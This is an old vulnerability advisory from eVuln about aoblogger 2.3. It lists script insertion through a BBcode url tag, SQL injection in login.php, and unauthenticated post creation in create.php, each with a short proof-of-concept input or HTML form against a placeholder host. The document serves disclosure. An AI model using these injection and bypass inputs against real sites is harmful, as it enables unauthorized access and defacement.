Multiple Vulnerabilities in aoblogger

Summary

Vulnerability: Multiple Vulnerabilities in aoblogger
Discovered: 2006.01.16
Last Update: 0 n/a
ID: EV0037
CVE: CVE-2006-0310 CVE-2006-0311 CVE-2006-0312
Risk Level: medium
Type: Multiple Vulnerabilities
Status: Unpatched
Vendor: n/a
Vulnerable Software: aoblogger (http://mikeheltonisawesome.com/)
Version: 2.3
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in aoblogger (http://mikeheltonisawesome.com/) script.

1. Arbitrary script code insertion is possible in BBcode [url] tag.

[url] tag isn't properly sanitized. This can be used to post arbitrary script code.

2. SQL Injection is possible.

Vulnerable script: login.php

Variable $username isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc - off

3. Unauthorized "New Entry" creation is possible.

Vulnerable script: create.php

This script checks variable $uza for existence and dont check username and password before adding new entry in database.

PoC/Exploit

1. BBcode Example:

[url]javascript:alert(123)[/url]

2. SQL Injection Example:

link: http://host/aoblogger/login.php
username: username'/*
password: any

3. New Entry creation

<form action="http://host/aoblogger/create.php" method="post">
<input name="uza" value=1>
<input name="title" value="anytitle">
<textarea name="message">anymessage</textarea>
</form>

Solution.

Solution for "Multiple Vulnerabilities in aoblogger" is not available. Check vendor's website for updates.

Multiple Vulnerabilities in aoblogger

Summary

Description

PoC/Exploit

Solution.

Company

Services

eVuln Labs

eVuln Tools